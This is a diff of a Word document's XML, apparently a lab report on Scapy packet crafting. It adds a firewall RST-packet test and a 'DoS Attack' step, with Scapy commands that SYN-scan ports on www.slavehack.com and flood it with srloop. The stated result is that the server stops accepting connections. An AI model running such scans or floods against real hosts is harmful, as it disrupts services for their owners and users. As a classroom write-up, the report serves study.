-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t>IP packet</w:t>
+                              <w:t>RST Flag packets</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -3570,25 +4670,13 @@
                         <w:rPr>
                           <w:sz w:val="22"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">1. </w:t>
+                        <w:t xml:space="preserve">3. </w:t>
                       </w:r>
                       <w:r>
                         <w:rPr>
                           <w:sz w:val="22"/>
                         </w:rPr>
-                        <w:t>A basic Ethernet and TCP</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t>/</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t>IP packet</w:t>
+                        <w:t>RST Flag packets</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -3637,7 +4725,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId12">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3711,35 +4799,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>p.payload</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>.flags</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = "R"</w:t>
+        <w:t>&gt;&gt;&gt; p.payload.flags = "R"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3758,25 +4818,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = sr1(p)</w:t>
+        <w:t>&gt;&gt;&gt; ans = sr1(p)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3800,7 +4842,6 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
@@ -3810,19 +4851,55 @@
         <w:t>analysis: incoming packet with RESET flag set is dropped by the firewall.</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="0"/>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Step 3: The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DoS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Attack</w:t>
+        <w:t>Step 3: The DoS Attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Procedure:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>First step towards DOS attack is we created a SYN packet to send to the target on specific ports.The response with SYN-ACT will tell us which all ports are listening.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3841,9 +4918,54 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>-----------#code--------------</w:t>
-      </w:r>
-    </w:p>
+        <w:t>&gt;&gt;&gt; packet = IP(dst="www.slavehack.com")/TCP(sport=1500,dport=[20,21,22,25,80,443,444],flags="S")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>W</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e then do the SYN flood using 'srloop' function.The srloop function sends p crafted packets at intervals of 0.1 seconds. The results of srloop are collected in ans (for answered packets) and unans (for unanswered packets). </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
@@ -3860,43 +4982,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = IP(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>dst</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>="www.slavehack.com")</w:t>
+        <w:t>-----------#code--------------</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3915,43 +5001,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = TCP(sport=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>1500,dport</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>=25)</w:t>
+        <w:t>&gt;&gt;&gt; ans,unans=srloop(p,inter=0.1,retry=2,timeout=4)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3978,36 +5028,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">p = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>ip = IP(dst="www.slavehack.com")</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4033,15 +5055,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>the attack!!!</w:t>
+        <w:t>tcp = TCP(sport=1500,dport=25)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4062,61 +5076,150 @@
         </w:rPr>
         <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>ans,unans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>p = ip/tcp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>srloop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>p,inter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>the attack!!!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>=0.1,retry=2,timeout=4)</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AEAE7E8" wp14:editId="4C74D4C9">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-373380</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>416560</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6713220" cy="3773170"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTight wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="21484"/>
+                <wp:lineTo x="21514" y="21484"/>
+                <wp:lineTo x="21514" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapTight>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 12"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6713220" cy="3773170"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ans,unans=srloop(p,inter=0.1,retry=2,timeout=4)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4131,17 +5234,16 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E45A84F" wp14:editId="3DF246A2">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E45A84F" wp14:editId="2384AA71">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
-                  <wp:posOffset>762000</wp:posOffset>
+                  <wp:posOffset>838200</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>3787140</wp:posOffset>
+                  <wp:posOffset>4017010</wp:posOffset>
                 </wp:positionV>
                 <wp:extent cx="4474210" cy="635"/>
                 <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
@@ -4195,26 +5297,16 @@
                               <w:rPr>
                                 <w:sz w:val="22"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">1. </w:t>
+                              <w:t xml:space="preserve">4. </w:t>
                             </w:r>
                             <w:r>
                               <w:rPr>
                                 <w:sz w:val="22"/>
                               </w:rPr>
-                              <w:t>A basic Ethernet and TCP</w:t>
+                              <w:t>DOS attack on server</w:t>
                             </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t>/</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t>IP packet</w:t>
-                            </w:r>
+                            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+                            <w:bookmarkEnd w:id="0"/>
                           </w:p>
                         </w:txbxContent>
                       </wps:txbx>
@@ -4232,7 +5324,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="1E45A84F" id="Text Box 8" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:60pt;margin-top:298.2pt;width:352.3pt;height:.05pt;z-index:-251618304;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape w14:anchorId="1E45A84F" id="Text Box 8" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:66pt;margin-top:316.3pt;width:352.3pt;height:.05pt;z-index:-251618304;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                   <w:txbxContent>
                     <w:p>
@@ -4253,26 +5345,16 @@
                         <w:rPr>
                           <w:sz w:val="22"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">1. </w:t>
+                        <w:t xml:space="preserve">4. </w:t>
                       </w:r>
                       <w:r>
                         <w:rPr>
                           <w:sz w:val="22"/>
                         </w:rPr>
-                        <w:t>A basic Ethernet and TCP</w:t>
+                        <w:t>DOS attack on server</w:t>
                       </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t>/</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t>IP packet</w:t>
-                      </w:r>
+                      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+                      <w:bookmarkEnd w:id="1"/>
                     </w:p>
                   </w:txbxContent>
                 </v:textbox>
@@ -4282,81 +5364,6 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AEAE7E8" wp14:editId="4B698897">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:posOffset>-373380</wp:posOffset>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>0</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="6713220" cy="3773170"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapTight wrapText="bothSides">
-              <wp:wrapPolygon edited="0">
-                <wp:start x="0" y="0"/>
-                <wp:lineTo x="0" y="21484"/>
-                <wp:lineTo x="21514" y="21484"/>
-                <wp:lineTo x="21514" y="0"/>
-                <wp:lineTo x="0" y="0"/>
-              </wp:wrapPolygon>
-            </wp:wrapTight>
-            <wp:docPr id="7" name="Picture 7"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 12"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId12">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6713220" cy="3773170"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-            <wp14:sizeRelH relativeFrom="page">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="page">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4368,14 +5375,6 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>analysis: server stops accepting SYN connections as shown in the screenshot(DOS.png), thus resulting in denial of service.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4392,25 +5391,107 @@
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>more about DOS attack.</w:t>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>analysis: server stops accepting SYN connections as shown in the screenshot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Figure 4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
